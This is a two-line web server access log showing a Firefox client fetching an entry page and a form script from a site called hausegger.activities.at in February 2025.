178.165.186.69 - - [10/Feb/2025:09:34:48 +0100] "GET /entry.php?id=10271&&ser=176428 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=176367" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:34:48 +0100] "GET /gui/javascript/form_form.js?1739176488 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=176428" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
